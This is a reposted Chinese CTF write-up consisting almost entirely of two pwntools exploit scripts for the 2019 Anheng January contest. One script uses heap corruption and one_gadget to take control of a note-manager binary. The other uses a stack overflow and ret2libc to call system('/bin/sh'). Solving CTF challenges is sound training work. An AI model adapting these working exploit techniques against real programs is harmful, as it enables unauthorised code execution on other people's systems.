安恒1月赛2019 PWN

其他 2019-02-19 09:00:53 阅读次数: 0

0x01 pwn1

from pwn import *
#context.log_level="debug"
def add(name,length,note):
       p.sendlineafter("4:exit\n","1")
       p.sendafter("Name:",name)
       p.sendlineafter("Len",str(length))
       p.sendafter("Description:",note)

def delete(index):
       p.sendlineafter("4:exit\n","2")
       p.sendlineafter("Back.\n>",str(index))

def edit(name,length,note,index):
       p.sendlineafter("4:exit\n","3")
       p.sendlineafter("Back.\n>",str(index))
       p.sendafter("?",name)
       p.sendlineafter("?",str(length))
       p.sendafter("Description :",note)
p=process("./mycard")
#p=remote("101.71.29.5",10006)
add("1\n",0x40,"1"*0x40)
add("2\n",0x50,"2"*0x50)
add("3\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(0)*2+p64(0)+p64(0xb1)+p32(0))
add("4\n",0x70,"4\n")
add("5\n",0x90,"555\n")
add("6\n",0x60,"666\n")
delete(5)
add("5\n",0x90,"5\n")
p.sendlineafter("4:exit\n","2")
p.recvuntil("Description :5")
p.recv(7)
p.send("\n")
libc_addr=u64(p.recv(8))
print hex(libc_addr)
for i in range(6):
    delete(1)
add("/bin/sh\x00\n",0x40,"1"*0x40)
add("2\n",0x50,"2"*0x50)
add("3\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(0)*2+p64(0)+p64(0xb1)+p32(0))
add("4\n",0x70,"4\n")
add("5\n",0x90,"555\n")
#add("kirin\n",0x80,"5\n")
delete(3)
delete(3)
#gdb.attach(p)
p.sendlineafter("4:exit\n","2")
p.recvuntil("[3] Name :")
p.recv(24)
heap_addr=u64(p.recv(6)+"\x00\x00")
print hex(heap_addr)
#p.recv(1024)
#add("kirin\n",4,"1234")
p.send("\n")
edit(p64(0xb0)+p64(0x20)+p64(heap_addr+0x100)+"\n",0x10,"kirin\n",3)
add("a\n",0x60,"b"*0x10+"\n")
add("a\n",0x60,"a"*0x10+"\n")
add("c\n",0x60,"c"*0x10+"\n")
edit("kirin\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(libc_addr-0x68-0x3)+"\n",3)
#gdb.attach(p)
print hex(libc_addr-0x68-0x3)
edit("a"*0x3+p64(libc_addr-0x68-0x3c4b10+0xf1147)+"\x00"*40+"\n",0x20,"\n",5)
add("\x00"*60+"\n",0x10,"\x00"*100)
#gdb.attach(p)
p.interactive()

0x02 pwn2

from pwn import *
from time import *
context.log_level='debug'

#while True:
#   if int(time())==now+3:
#      break
#p=remote("101.71.29.5",10013)
p=process("./rrr")
p.recvuntil(">\n")
payload1="a"*47+"\x00"+p32(0x804a888)+p32(0x8048410)+p32(0x8048602)+p32(0x804a018)
p.sendline(payload1)
s=u32(p.recvuntil("\n")[:4])-0x5fca0+0x3ada0#-0x5f140+0x3a940
payload1="a"*47+"\x00"+p32(0x804a888)+p32(s)+p32(0)+p32(s-0x3ada0+0x15ba0b)#-0x3a940+0x15902b)
#gdb.attach(p)
p.sendline(payload1)
p.interactive()

猜你喜欢

转载自blog.csdn.net/weixin_34168700/article/details/87680504
pwn
今日推荐
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
周排行
[编程题]学英语
[codeforces 1288A] Deadline 约数+模
Python的web开发
Docker在Centos 7上的部署
python编码
解决Ubuntu16.04 fatal error: json/json.h: No such file or directory
mysql并发插入
rest接口如何适应jsonp的方案
linux 终端上网设置
高数——等号两边同时求导、积分的解释
每日归档
更多
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022